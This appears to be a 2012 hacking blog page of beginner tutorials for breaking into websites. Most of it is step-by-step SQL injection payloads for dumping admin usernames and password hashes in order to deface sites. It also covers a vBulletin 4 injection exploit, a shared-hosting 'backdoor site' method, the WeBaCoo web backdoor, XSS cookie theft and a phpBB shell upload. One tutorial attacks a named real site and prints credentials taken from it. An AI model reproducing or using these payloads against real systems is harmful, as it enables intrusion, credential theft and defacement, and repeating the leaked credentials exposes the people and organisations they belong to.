BURN HACKER

SQL Injection Tutorial! 100% NOOB FRIENDLY!! No Previous Hacking Knowledge Needed

2012-02-01T22:51:00.001+06:00

SQL Injection

Hi, this thread covers all your basic SQL Injection needs. After reading this, you should be able to successfully retrieve Database information such as the username and password that are crucial for defacing sites.

Lets start.

What is SQL Injection?
is a code injection technique that exploits a security vulnerability occurring in the database layer of an application (like queries). The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.
Source

Step 1: Choose Your Target:
Of course, you can't SQL Inject nothing. You must have a website as a target. Remember, only vulnerabl sites are able to be injected into. You can't just SQL Inject any site *sigh*.

So how do we see which sites are vulnerable? There are many lists of vulnerable sites out there. But if you wish to find them manually, read on.
Dorks
Wtf is this? These are "Dorks" that you can use to find vulnerable sites. Go to Google and simply copy and paste one of those dorks and click search.

I personally recommend going here (scanner seems to be down) to see which sites are vulnerable, but if you wish to do THAT manually also, read on. If not, skip to Step 2.

After you have Googled the dorks, click on any site.

To check the site for vulnerability, simply add a "'" to the end of the URL (without the quotes). It should look somewhat like this:

Code:
http://www.sitename.com/main.php?id=232'

If the page simply refreshes, the site is not vulnerable. But if an error of any kind pops up, the site is prone to SQLi. When you have successfully found a vulnerable site, proceed to Step 2.

Step 2: Find the Vulnerable Column
Now that we found our vulnerable site, we will need to find the vulnerable columns.

Add this to the end of the URL:

Code:
http://www.sitename.com/main.php?id=232 order by 1--

Now here's where it gets tougher (not really). You have to look for errors as you enter new numbers. For example:

Code:
http://www.sitename.com/main.php?id=232 order by 1-- (no error)
http://www.sitename.com/main.php?id=232 order by 2-- (no error)
http://www.sitename.com/main.php?id=232 order by 10-- (ERROR!)
http://www.sitename.com/main.php?id=232 order by 5-- (no error)
http://www.sitename.com/main.php?id=232 order by 6-- (ERROR!)

The goal here is to find the least column the shows the error. As you can see in the example, the lowest column that we found an error on is column 6, therefore, column 6 doesn't exist and there are only 5 columns.

Now we have to find which one of these five columns (it may be different in your case) is vulnerable, to do that, add this code to the end of the URL:

Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,4,5--

Make sure to include the - in the beginning and the -- at the end, this is crucial. Remember that the code above may be different in your case regarding how many columns there are.

Now, if you see numbers on the screen. You can proceed. The very first number is the number of the vulnerable column. If the number is "4" that means that the 4th column is the vulnerable column.
Step 3: Obtain Version Number and Database Name
That vulnerable column is the ONLY column that we will be editing.

Assuming that the vulnerable column is 4 (it may be different in your case), proceed to find the version number. To find the version number, replace the vulnerable column with "@@version" like this:

Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,@@version,5--

If the version is 5 or above, proceed. If not, it will be harder to hack. There are other tutorials covering how to hack database versions 4 or lower.

Now we must find the database name. To do this, replace the "@@version" from before with "concat(database())" like this:

Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,concat(database()),5--

And BOOM! The database name should appear on your screen. Copy this somewhere safe, we will need this for later.
Step 4: Obtain Table Names

We are almost done, don't give up just yet.

Now we have to find the table names. This is crucial because the tables contain all of the information that we may need. Some hackers look for credit card information and e-mail adresses, but in this tutorial we will be looking to retrieve the username and password in order to deface the site.

Edit the code as follows:

Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,group_concat(table_name),5 from information_schema.tables where table_schema=database()--

Now, names appear. Look for obvious names hinting to tables where user information can be stored. You are looking for table names such as "Admin", "Users", "Members", "Admin_Id", Admin_pass", "User_id", etc..

The last character is chopped off? Don't worry. Count how many tables you can see, then add this code based on the tables that you can see. We will be assuming that the last table you can see is the 8th table.

Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,table_name,5 from information_schema.tables where table_schema=database() limit 8,1--

This code is to view the 9th table. Replace the 8 with a 9 to view the 10th table, and so on until you find the table that you think has the most crucial information.

When you find the table, copy the name somewhere safe. We will need both the database and table names for the next step.

For this tutorial, we will be using the table name of "admin".
Step 5: View the Columns, and Find the Crucial Shit
Here comes the fun part :3

To find the column names, add this to the end of the URL:

Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,group_concat(column_name),5 from information_schema.columns where table_name="admin"--

Didju get an error? OH NO! YOU FAIL. Choose another site. Just kidding.
Go here and type in your table name where is says "Say Hello to My Little Friend".

In my case, this is the string that I got after I inputted "admin" to the input space:

Code:
61646d696e

Now, replace the table name with hex as so:

Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,group_concat(column_name),5 from information_schema.columns where table_name=0x61646d696e--

Notice how I added the "0x", that is to indicate that hex is being used. Remember to get rid of the quotes.

Now after you enter this code, you should see where all the juicy information is contained. An example of what you should see is:

Code:
Admin_Username, Admin_Pass, Admin_credentials, User_credentials, Members, etc..

Now say you want to view what is in the "Admin_Username" and the "Admin_pass", add this code (in this example we will be using "database" as the database name and "admin" for the table name):

Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,group_concat(Admin_Username,0x3a,Admin_Pass),5 FROM database.admin--

The "0x3a" will put a colon to where the information will be separated. You should get something like this:

Code:
1:MyName:e10adc3949ba59abbe56e057f20f883e

The username is "MyName" and the password is.. WAIT! That is MD5, crack this using Havij. Download Havij here.

Now as you can see. This is the login info:

Code:
Username: MyName
Pass: 123456

Now all you have to do is find the admin page, which is usually
Code:
http://www.sitename.com/admin
http://www.sitename.com/adminlogin
http://www.sitename.com/admin_login
http://www.sitename.com/login
or something similar. There are tools online that will find you the admin page.

Any questions? PM me.
©2011, copyright BLACK BURN

MySQL Injection[FULL TUTORIAL]

2012-02-01T22:47:00.002+06:00

MySQL Injectioin Tutorial
Structure:

1.Intro#

2.What is SQL

3.MySQL

4.How to find vulnerability

5.Exploiting Mysql vulnerability

6.Getting Mysql Version

7.Getting Mysql User

8.Getting Mysql Databases

9.Getting Mysql Tables

10.Getting Mysql Columns

11.Getting Information From Columns

12.Finding Admin Panel

13.Tools

14.Greetz

15.End#

1. Intro#

today am going to explain MySQL Injection on Live Example.What that means?-Well it means that i'll exploit an real site.This tutorial is for anykind level reader,student,newbie even noob.I just wonna to show you how easy is this prefor of Attack.So enough talking we have a lot of things to cover here.

2. What is SQL?

SQL injection is probably the most abundant programming flaw that exists on the internet at present. It is the vulnerability through which unauthorized person can access the various critical and private dat. SQL injection is not a flaw in the web or db server but but is a result of the poor and inexperienced programming practices. And it is one of the deadliest as well as easiest attack to execute from remote location.
In SQL injection, we interact with DB server with the various commands and get various data from it. In this tutorial, I would be discussing 3 aspects of SQL injection namely bypassing logins, accessing the secret data and modifying the page contents.

3. MySQL

MySQL is a relational database management system (RDBMS) that runs as a server providing multi-user access to a number of databases. It is named after developer Michael Widenius daughter, My. The SQL phrase stands for Structured Query Language.

=So the basic what you need to know about SQL and MySQL are done now the real part begins

4. How to find vulnerability

There many many ways to find vulnerability.Most familiar ways are using the Google Dorks:

inurl:index.php?id=
inurl:article.php?id=
allinurl:news.php?id=
inurl:shop.php?cat=

Hackers always say "Google is my Best Friend" now you know way without of google we couldn't do our job so easy.So at the end of this tutorial i'll post a dork list so am going to save you from searching the internet.

5. Exploiting Mysql vulnerability

So lets start with exploiting our target.For this tutorial i dicided to chose European Table Tennis Union

Code:

http://www.ettu.org

I have used a dork inurl:news_view.php?id= and i got this link of the site

Code:

http://www.ettu.org/news_view.php?id=2583

So how can we test it is it vuln. on MySQL Injection? - Its simple with adding ' or % at the and or before the id.Now our vuln. link should look like this

Code:

http://www.ettu.org/news_view.php?id=2583'

Did you notice something was changed?-Yes the content that was previos on the site was not showed.So this is a sing that this site may be vuln. on MySQL Injection sometimes will print you a message that says

Code:

Warning: mysql_fetch_assoc(),Warning: mysql_fetch_array(),mysql_num_rows(),mysql error,mysql_query,mysql_fetch,mysql_connect

In this case doesn't show so we also may be facing with MySQL NoError Injection.How can we know for sure is it vuln.?-We are going to start typeing

ORDER BY 1 After the ID number

Code:

http://www.ettu.org/news_view.php?id=2583+ORDER+BY+1

So our content is shown agaen.And now we are sure we're facing a site that is vuln. on MySQLInjection.We continue to incrise the Order Number so we find out how many columns are there until we get an blan page agaen.

Code:

http://www.ettu.org/news_view.php?id=2583+ORDER+BY+2 <== No blank Page

Code:

http://www.ettu.org/news_view.php?id=2583+ORDER+BY+3 <== No blank Page

Code:

http://www.ettu.org/news_view.php?id=2583+ORDER+BY+4 <== No blank Page

Code:

http://www.ettu.org/news_view.php?id=2583+ORDER+BY+10 <== No blank Page

Code:

http://www.ettu.org/news_view.php?id=2583+ORDER+BY+15 <== No blank Page

Code:

http://www.ettu.org/news_view.php?id=2583+ORDER+BY+16 <== No blank Page

Code:

http://www.ettu.org/news_view.php?id=2583+ORDER+BY+17 <== Blank Page

wOOt!! We now know that there are 16 vuln. columns!!

Now we are going to select them all with this comand UNION SELECT or UNION ALL SELECT

Code:

http://www.ettu.org/news_view.php?id=258...14,15,16--

Dont forget to put "--" at the end or it will return an blank page.So the content loads agaen and lets see witch of these vuln. columns we can use.To do that we add a '-' before the ID Number

Code:

http://www.ettu.org/news_view.php?id=-25...14,15,16--

So this is very important if you dont do this you cannot continue to do the next several steps and now it prints us a vuln. columns number 2 and number 4.So this means that columns with number 2 and 4 are vulnruble and we can use them.To get Mysql version,User,Databases.

6. Getting Mysql Version

To get MySQL version we use version() or @@version commands to dispaly version of MySQL Database.So we change 2 into @@version and

Code:

http://www.ettu.org/news_view.php?id=258...14,15,16--

there is it MySQL Version displayet at the page.

Code:

5.1.37-1ubuntu5.5

So when MySQL Version is 5> we can use information_schema to get data faster but if version is >5 that means that we need to guess the tables and columns.So we need to be very lucky to guess the tabale and column.

7. Getting Mysql User

Getting the user is with the user() command

Code:

http://www.ettu.org/news_view.php?id=-25...14,15,16--

Displayed

Code:

ettu_admin@localhost

8. Getting Mysql Databases

So now we need to get the databases with the followed command database()

Code:

http://www.ettu.org/news_view.php?id=-25...14,15,16--

Displayed

Code:

ettu.org_ettu_db01

Sometimes there are more databases so it good to know how many databases there are and why are they for.Becouse maybe the data we are looking is in the other database.

9. Getting Mysql Tables

And here we are at the main think.How to find out the table names.

We are going to do this with adding this command

Code:

group_concat(table_name)

at the place of the vun. column and in our case is 2 and with adding at the end of the number of columns the following command

Code:

FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE()

What does this mean?-This means to select Table Names from information_schema where table schema is from the Database. and when we replace everything we get this link and this tables:

Code:

http://www.ettu.org/news_view.php?id=-25...,14,15,16+

FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--

We got a lots of tables but we dont need them all so am going to press Ctrl+F [Find specific word] and type user,users,admin,members and it turns out that there is a table with the name

Code:

0910ettucup01_admin

Now we know that there is table with name admin and there must be some username and passwords but to that we need to find the columns in that table!

10.Getting Mysql Columns

We found out that theres a table admin and now we need to find the columns we need to change table_name to column_name and

Code:

FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--

to

FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_SCHEMA=DATABASE()--

Now when we change all that we get

Code:

http://www.ettu.org/news_view.php?id=-25...,14,15,16+

FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_SCHEMA=DATABASE()--

with executing this we get a lot i mean really a lot of columns name that we dont need and it may take a while till we find our most needed columns so we are going to pull out only the columns from our table that we found earlier and that is from ettu.org_ettu_db01 to do this we need to you MySQL Char How to find it?-Well you can always use google or you can install on your mozila an addon with name HackBar there is a MySQL char converter so now am going to convert our table into a Mysql Char

Code:

CHAR(48, 57, 49, 48, 101, 116, 116, 117, 99, 117, 112, 48, 49, 95, 97, 100, 109, 105, 110)

Now where to put this?-We are going to change our link into:

Code:

http://www.ettu.org/news_view.php?id=-25...,14,15,16+

from+information_schema.columns+where+table_name=CHAR%2848,%2057,%2049,%2048,%20101,%20116,%20116,

%20117,%2099,%20117,%20112,%2048,%2049,%2095,%2097,%20100,%20109,%20105,%20110%29--

Now are displayed the columns that are in Table 'ADMIN'

Code:

id,login,password,stato,id_squ,girone,abilitato

Our work is almost done.Just to dump usernames and passwords.

11.Getting Information From Columns

To do this we are going to use a command that we are using it all the way till here.And that is group_concat().All we now need to do is to change column_name into our ectual column names and that are "login,password,id,stato ect" So lets see how ill it looks

Code:

http://www.ettu.org/news_view.php?id=-25...,14,15,16+

from+0910ettucup01_admin--

Damn the usernames and passwords are displayed at the site.So let explain here what we have done.We have changed information_schema.columns into the table name 'cuz we dont need not to read the columns 'cuz we already put them into the group_concat() you see id login password those are columns now from where to be selected from the table name 0910ettucup01_admin and now we have our login details:

Code:

1:adminvitesse:vitesse2006

2:admin:matchvitesse

All it left now is to find the Admin Panel....

12.Finding Admin Panel

Unfortunatly our live example site doesn't have an admin panel so for this to show you i'll took another site.So when you got the admin details we need to login somewhere that somewhere is called Admin Panel or ControlPanel or WebPanel its same or you can say it Login Page.To find an login page you can use many tools ill tell you some in the next part.An example of an login page

Code:

http://www.discountexpress.co.uk/admin/

There you can enter the login info and get into the site and change alot

13.Tools

So tools,there aren't so much tools to use when your doing this but there are a few that will help you a lot.

13.1.Admin Finder

Admin finder is a tool that helps you to find the admin page or Login Page very quick for this you can use many online or you can use some webscanner to find it.Here are 1 Good program and one good Online Scanner

Online Admin Page Scanner

And for download

Acunetix Web Vulnerability Scanner

=>This scanner could be used for more things but now we are not going to talk about them

13.2 Hacking Tools that are making you're work easier

Well we all know that some of you have started with tools ex.Havij or MySQL Helper.Yes they are good in hand expecialy when we are hacking into a MySQL Server >5 that are guessing the table and column names so that is realy good also Havij is a great program that have Admin Finder too and MD5 Section where you can easly search about 10-12 MD5 Decripting sites so yes its realy good program but dont use it for hacking all the way into the server 'cuz it leaves a lotz of logs and you my be finish in jail

©2011, copyright BLACK BURN

SQL Injection On Vbulletin 4 [Group Exploit]

2012-02-01T22:29:00.002+06:00

SQL Injection On Vbulletin 4 [Group Exploit]

Hey fellas,
Its been long time since i have posted a new tutorial . BUt like always , here is yet another quality tutorial
So most of us refer vbulletin as invulnerable . But , nothing is unvulnerable > So here is how to do it .

1.First get , Mozilla Firefox 3.6.17
2.Download the Live HTTP Headers addon for Mozilla Firefox.
3.Go to google and search this :

Quote:insite: Powered by vBulletin™ Version 4.1.2

4.Find a website that has forum version 4.0.0 to 4.1.2.
5.Now you need to be sure that groups are enabled for that website . Make sure it has groups or this will not work .
6. Now make an account on that forum .
7.Verify your account
8.Now go to the groups section and copy any of the group name .
9.Click on Advanced Search on the top.
10.Open the newly installed addon called LIVE HTTP headers. (Tools -> Liver HTTP Headers)
11. Now click on clear if the page is full.Make sure Capture is ticked or selected.
12.Now paste the group name in the "Keyword(s)" .
13.Make sure "Search Titles Only is selected .
14. Now click Search and make sure you are capturing on your live feed header.
15.So now you must get the group . If you have not , then you possibly did something wrong .Don't worry,try it again !
16.Now go to Live HTTP headers and scroll to the top.
17.Now you need to search for something like this : "type%5B%5D=7"It must be easily found and mostly is found underneath content length.
18.Select it so it is highlighted then click on replay.
19.Now a pop up box will appear with "process&searchthreadid=" at the end.
20.Now put any of these in the box according to your needs :

To see database:

Quote:&cat[0]=1) UNION SELECT database()#

To see tables:

Quote:&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#

To see information on the first user:

Quote:&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#

Now anyone can do the rest. It is tested and working
Hope you like my tutorial.
Thanks for reading.

Make search engine with your name or whatever you want!!

2012-02-01T22:23:00.000+06:00

im going to show u web page that you can change your search engine with your name or whatever you want.
and also it can set as homepage of google.

HOMEPAGE
©2011, copyright BLACK BURN

HOW TO HACK UNHACKABLE SITE

2012-02-01T22:13:00.000+06:00

Introduction

Sometimes site that is your TARGET just isn't hackable. Even Acunetix Web Security Scanner can't find useful vulnerability. In that kind of situation the only thing that might work is to hack site (backdoor site) that is on same server and through that site and through server to penetrate the site.

Tools required:

GNY.Shell

Finding Backdoor Site

To find backdoor site go to

Code:
http://www.domaintools.com/

and in Whois Lookup enter your TARGET site

As a result you'll get Whois Record

Look for Reverse IP
In our case 25 other sites hosted on this server.
Click on it to see names of the hosted sites on the same server.

You will see few of them, to see all, click on more...

To see them all you must be a member.
You can easily Sign up for a FREE account by cicking on Create an Account
(use some anonymous email service for that)
As a member you can see all 25 other sites hosted on that server.

Hacking Backdoor Site

Here we have 25 potentional backdoor sites and our target one.
Let's say after analysing we find that our backdoor sites No17 (as example) and target No22

Backdoor site can be any one from the list who can be hacked and sell uploaded

Penetrate Target Site

By cicking on var/ at www.backdoorsite.com we go straight to root of the server

Where we can find our www.target.com dir.
Sometimes premisions isn't drwx but dr-x which is more then enough to read configuration file.

With data from that file we can hack unhackable site...
©2011, copyright BLACK BURN

--< Ultimate MySQL Injection Tutorial For Beginners >--

2012-02-01T22:03:00.002+06:00

--< Ultimate MySQL Injection Tutorial For Beginners >--

Contents
1A: Understanding SQL Injection
1B: Tricks & Tools
1C: Requirements
------
2A: Searching for Targets
2B: Testing Targets for Vulnerabilities
2C: Finding Columns
2D: Finding Vulnerable Columns
------
3A: Obtaining the SQL version
3B: Version 4
- 1. Obtaining Tables & Columns
- 2. Commands
3C: Version 5
- 1. Obtaining Table Names
- 2. Obtaining Column Names from Tables ------------------------------------------------------------------------
1A: Understanding SQL Injection
SQL Injection is one of todays most powerful methods of system penetration, using error

based queries one is able to extract data (tables & columns) from a vulnerable system,

namely the (database).

1B: Tricks & Tips
Beginners tend to believe that using tools created by advanced SQL injection artists are the

best way around things, please believe that they aren't, everything seems nice and easy with

tools such as (BSQLi and SQLi Helper) which they are, but the users posting the download

links for both applications around the world on hacking forums have been known to very

securely encrypt these tools with malicious files or backdoors etc, I've experienced this

first hand when I first started out. Learning everything manually will help you understand

the environment you are attempting to penetrate, whilst experimenting with commands you have

learnt will only help you become more advanced in SQL injection, as for tricks, there are

many articles named (Cheat Sheets) because this is what they are, purposely created for SQL

injectors to use commands which aren't normally spoken of or known about, Samples are

provided to allow the reader to get basic idea of a potential attack.

1C: Requirements:
When I first started SQL injection personally for me it wasn't to hard to get on the ball

and learn quickly, this is because I had previous knowledge of web-scripts, how the internet

works, and the ability to read and understand complicated tutorials. I believe it's a whole

lot easier if you know the basics of a computer system and how the internet works.
To learn you must be able to read and understand the tutorial or article provided and take

on board everything you see. When I was a beginner I found it easier to attack whilst

reading, do everything in stages, don't read the whole tutorial and go off and expect to

inject off the top of your head. ------------------------------------------------------------------------
2A Searching for Targets
Ahh, the beauty of searching for targets is a lot easier than it sounds, the most common

method of searching is (Dorks). Dorks are an input query into a search engine (Google) which

attempt to find websites with the given texxt provided in the dork itself. So navigate to

Google and copy the following into the search box:
inurl:"products.php?prodID="
This search will return websites affiliated with Google with "products.php?prodID=" within

the URL.
You can find a wide range of dorks to use by searching the forum.
I advise you to create your own dorks, be original, but at the same time unique, think of

something to use that not many people would have already searched and tested.
An example of a dork I would make up:
inurl:"/shop/index.php?item_id=" & ".co.uk"
So using your own dorks isn't a bad thing at all, sometimes your dorks wont work, nevermind

even I get it..

------------------------------------------------------------------------
2B: Testing Targets for Vulnerabilities
It's important that this part's done well. I'll explain this as simply as I can.
After opening a URL found in one of your dork results on Google you now need to test the

site if it's vulnerable to SQL injection.

Example:
http://www.site.com/index.php?Client_id=23

To test, just simply add an asterik ' at the end of the URL

Example:
http://www.site.com/index.php?Client_id=23'

How to tell if the sites vulnerable:
- Missing text, images, spaces or scripts from the original page.
- Any kind of typical SQL error (fetch_array) etc.

So if the website you're testing produces any of the above then the site is unfortunately

vulnerable, which is where the fun starts.

------------------------------------------------------------------------
2C: Finding Columns & the Vulnerable Columns
As I noted in the first section of the tutorial I advise you do pretty much everything

manually with SQL injection, so by using the following commands (providing they're followed

correctly) you will begin to see results in no time

Example:
http://www.site.com/index.php?Client_id=23'
^^^^^^^^^^^^^^^^^^^^^^^^
IF THE SITE IS VULNERABLE
Refer to the following to checking how many columns there are.
(order+by) the order by function tells the database to order columns by an integer (digit

e.g. 1 or 2), no errors returned means the column is there, if there's an error returned the

column isnt there

wxw.site.com/index.php?Client_id=23+order+by+1 < No Error
wxw.site.com/index.php?Client_id=23+order+by+2 < No Error
wxw.site.com/index.php?Client_id=23+order+by+3 < No Error
wxw.site.com/index.php?Client_id=23+order+by+4 < ERROR

From using order+by+ command and incremating the number each time until the page

displays an error is the easiest method to find vulnerable columns, so from the examples

above when attempting to order the columns by 4 there's an error, and so column 4 doesn't

exist, so there's 3 columns.

------------------------------------------------------------------------
2D: Finding Vulnerable Columns
Ok so let's say we were working on the site I used above, which has 3 columns. We now need

to find out which of those three coluns are vulnerable. Vulnerable columns allow us to

submit commands and queries to the SQL database through the URL. (union+select)

Selects all columns provided in the URL and returns the value of the vulnerable column e.g.

2.

Example:
wxw.site.com/index.php?Client_id=23+union+select+1,2,3

The site should refresh, not with an error but with some content missing and a number is

displayed on the page, either 1, 2 or 3 (as we selected the three columns in the above URL

to test for column vulnerability).
Sometimes the page will return and look completely normal, which isn't a problem. Some sites

you are required to null the value you're injecting into.

In simpler terms, the =23 you see in the above URL after Client_id must be nulled in order

to return with the vulnerable column. So we simply put a hyphen (minus sign) before the 23

like so: -23
So the URL should now look something like this:

wxw.site.com/index.php?Client_id=-23+union+select+1,2,3

Now that should work, let's say the page refreshes and displays a 2 on the page, thus 2

being the vulnerable column for us to inject into. ------------------------------------------------------------------------
3A: Obtaining the SQL Verison
Easier said than done, using the information found in the above sections e.g. amount of

columns and the vulnerable column. We now use a command (@@version) and in some cases

a series of commands to determine what the SQL version is on the current site. Version 4 or

version 5. See the example below to view what a URL should look like when the version

command has been inserted into the URL replacing the number 2 as 2 is the vulnerable column

on the example site.

Example:
wxw.site.com/index.php?Client_id=-23+union+select+1,@@version,3

What you need to look for is a series of numbers e.g:
5.0.89-community
4.0.45-log

If the above failes and the site just returns an error or displays normally then we need to

use the convert function in order for the server to understand the command, don't worry

though this is usually the only thing you need to convert and it's on a rare occasion where

this is the case.

So, if the example site returned an error we need to replace @@version with the convert()

function:
convert(@@version using latin1)

So the example site will now look like this:
wxw.site.com/index.php?Client_id=-23+union+select+1,convert(@@version using latin1),3

Now if the page still decides to not return the error then the query must be hexxed:
unhex(hex(@@version))

So the example site will now look like this:
wxw.site.com/index.php?Client_id=-23+union+select+1,unhex(hex(@@version)),3

Depending on which version the SQL server it is, whether it be 4, or 5 the queries for

obtaining data from both versions are different, version 4 and 5 tables are explained below

------------------------------------------------------------------------
3B Version 4
- 1. Obtaining Tables and Columns

You will notice that obtaining tables and columns from version 4 MySQL servers is a little

more time consuming and confusing at times as we have to guess pretty much everyhing.

Because version 5 is more up to date and has information_schema which the database and

tables are stored in, MySQL version 4 doesn't.
Providing the MySQL version of the website is 4, we must do the following.

So, back to the example URL:
wxw.site.com/index.php?Client_id=23+union+select+1,@@version,3

We must now go back to the original URL which is:
wxw.site.com/index.php?Client_id=23+union+select+1,2,3

This is where the guessing begins, we need to guess table names.
How can we tell if the table name I guess exists?
The same as where we tested for the amount of columns.
If no error is produced then the table guessed exists.
Is there is an error then the table guessed doesn't exist, so just try another.
So we use the (from) command followed by the table name you are looking to see

exists.

Example:
wxw.site.com/index.php?Client_id=23+union+select+1,2,3 from admin

Usual tables most people search for consist of obtaining user data, so again, be creative

just like with the dorks, common table names I use:

tbl_user, tbl_admin, tbl_access, user, users, member, members, admin, admins, customer,

customers, orders, phpbb_users, phpbb_admins

So if we tried the following as an example:

wxw.site.com/index.php?Client_id=23+union+select+1,2,3 from admin
^^^
Error

wxw.site.com/index.php?Client_id=23+union+select+1,2,3 from user
^^^
Error

wxw.site.com/index.php?Client_id=23+union+select+1,2,3 from users
^^^^^
No Error

Now which table do you think exists..?
The table users exists

We are now required to guess column names from the existing table. So thinking logically,

which labelled columns within this table would represent data? Columns such as:
first_name, last_name, email, username, password, pass, user_id
^^^^^^^^^^^^^^^^^^^^^^^^^
Typical columns found in the users table.

So we now must think back to which column is vulnerable (in this case 2) and so we'll use

the URL and replace 2 with the column name you are attempting to see if exists in the users

table. Let's try a few of the typicals listed above:

wxw.site.com/index.php?Client_id=23+union+select+1,f_name,3 from users
^^^^
Error

wxw.site.com/index.php?Client_id=23+union+select+1,l_name,3 from users
^^^
Error

wxw.site.com/index.php?Client_id=23+union+select+1,address1,3 from users
^^^
Error

wxw.site.com/index.php?Client_id=23+union+select+1,email,3 from users
^^^^^
No Error

From the above we can clearly see that the column email exists within the table users, the

page should return displaying data (most probably an email address) or the data you are

extracting i.e if you pulled password from users and the column exists the first password

within that column will be displayed on screen.

2. Commands
From here we will be able to use certain commands to determine the amount of data we pull

from the database or which exact record you wish to pull from a column.

concat()

We will now use the concat() function to extract data from multiple columns if only one

column is vulnerable, in this case remembering back the vulnerable column is 2, so we can

only query in within this space.

Command: concat(columnname1,0x3a,columnname2)
0x3a is the hex value of a semi-colon : so the output data from the query will be displayed

like:this

Example:
wxw.site.com/index.php?Client_id=23+union+select+1,concat(email,0x3a,password),3 from users

The above will output the first email and password found in the table.

group_concat():

We will now use the group_concat() function to group all data from one column and display

them on one page. Same as the above concat() command just grouping all records together and

displaying them as one.

Example:
wxw.site.com/index.php?Client_id=23+union+select+1,group_concat(email,0x3a,pass),3 from

users

Now the above should return ALL e-mails and passwords listed in the email and passwords

column within the users table.

limit 0,1
The limit command is somewhat useful if you're looking for a specific data record. Say for

instance we wanted to obtain the 250th record for emails in the table users. We would use:

limit 250,1
Thus displaying the 250th e-mail within the data.

Example:
wxw.site.com/index.php?Client_id=23+union+select+1,email,3+from+users+limit+250,1 ------------------------------------------------------------------------
Version 5
- 1. Obtaining Table Names

Now after that painstaking version 4 malakey lol, we're onto version 5, the easiest and

quickest version of MySQL to hack, so many things are already done for you, so realise the

possibilities and be imaginative.

Obtaining table names for version 5 MySQL servers is simple, using information_schema.tables

< For table extraction

So, example of the URL from earlier, but imagine it is now version 5

Example:
wxw.site.com/index.php?Client_id=-23+union+select+1,table_name,3+from+information_schema.tab

les

The above URL will display only the first table name which is listed in the database

information_schema. So using group_concat()
just like in version 4 works with the same principle.

Example:
wxw.site.com/index.php?Client_id=-23+union+select+1,group_concat(table_name),3 from

information_schema.tables

We should now be able to see all the tables listed on one page, sometimes the last tables

will be cut off the end because a portion of the page will be covered in table names from

information_schema which aren't useful for us so really, I usually prefer to display table

names from the primary database rather than information_schema, we can do the following by

using the +where+table_schema=database() command:
where => A query for selection
table_schema => Schema of tables from a database
database() => In context the primary database, just leave it as it is.

Example:
wxw.site.com/index.php?Client_id=-23+union+select+1,group_concat(table_name),3+from+informat

ion_schema.tables+where+table_schema=database()

Example List of tables:
About, Admin, Affiliates, Access, Customer, Users

Now all tables should be displayed from the primary database, take your pick and get ready

to extract columns.

2. Obtaining Column Names from Table Names

Ok, suggesting from the above we decided to obtain column information from the table Admin.
Using information_schema once again but this time we will be using:
informaiton_schema.columns
instead of
informtion_schema.tables (as we want to extract columns now, not tables)

The thing with obtaining column information is similar to the principle of obtaining columns in version 4, except we dont have to guess, once again just one command lists them all when combines with group_concat()

Command:
Edit the vulnerable column (in this case 2) to:
column_name instead of table_name

And the end of the URL to:
+from+information_schema.columns where table_name=TableNameHEX

Example:
wxw.site.com/index.php?Client_id=-23+union+select+1,group_concat(column_name),3 from information_schema.columns where table_name=Admin

Now the above will return an error because of the way the command is used at the end of the URL (where table_name=Admin)
We must HEX the table name, in this case Admin
I use THIS website to for converting Text to Hex.

The HEX of Admin is: 41646d696e
Now we must add 0x (MySQL integer) at the front of the HEX, which should now look like this: 0x41646d696e
And pop it onto the end of the URL replacing Admin, so the URL should look something like the following.

Example:
wxw.site.com/index.php?Client_id=-23+union+select+1,group_concat(column_name),3 from information_schema.columns where table_name=0x41646d696e

Now all columns from the table Admin will be displayed on the page, just the same as version 4 we will use the same command to extract data from certain columns within the table.

Say for instance the following columns were displayed:
username, password, id, admin_user

We would be able to do the same as version 4, replacing the vulnerable column (2) with a column name (one of the above) i.e. username and password using the concat() function.

Example:
wxw.site.com/index.php?Client_id=-23+union+select+1,concat(username,0x3a,password),3+from+Admin

Will display the first username and password data entries from the columns username and password in the table Admin.

You can still use group_concat() & limit 0,1
Exactly the same as version 4

WeBaCoo v.0.2.2

2012-02-01T15:53:00.002+06:00

WeBaCoo (Web Backdoor Cookie) is a web backdoor script-kit, aiming to provide a stealth terminal-like connection over HTTP between client and web server. It is a post exploitation tool to maintain access to a compromised web server.

WeBaCoo was designed to operate under the radar of modern up-to-dated AV, NIDS, IPS, Network Firewalls and Application Firewalls, proving a stealth mechanism to execute commands to the compromised server. The obfuscated communication is accomplished using HTTP header’s Cookie fields under valid client HTTP requests and relative web server’s responses.

The script-kit has two main operation modes: Generation and “Terminal”. Using generation mode, user can create the backdoor code containing the PHP payloads. On the other hand, at the remote “terminal” mode the client can connect to the compromised server where the backdoor PHP code has been injected. In order to establish the remote “pseudo”-shell, the user must provide the server’s URL path containing the injected code.

Video:
http://www.securitytube.net/video/2731
Site:
https://bechtsoudis.com/webacoo/
Download:
http://bechtsoudis.com/data/tools/webacoo-latest.tar.gz
https://github.com/anestisb/WeBaCoo/
©2011, copyright BLACK BURN

xss tutorial

2012-02-01T12:22:00.002+06:00

this is a awesome xss tutorial. (the sad part is we do not see codes.)
maybe in future when i posted all kinds of sqli.
i will post a thread on xss to.

lissen good at what you all can do.
you can steal cookies from the site visitors.
but cookies do not only include the site cookie.
you could get his facebook cookie and more.

or you could make a session expired error which asks visitors to enter their password.

Shelling phpBB ----> 2.x.x Remote Code Execution

2012-02-01T12:16:00.003+06:00

Today I'm going to be showing you how to get your shell uploaded on phpBB --> 2.x.x

Checking The Server Configuration

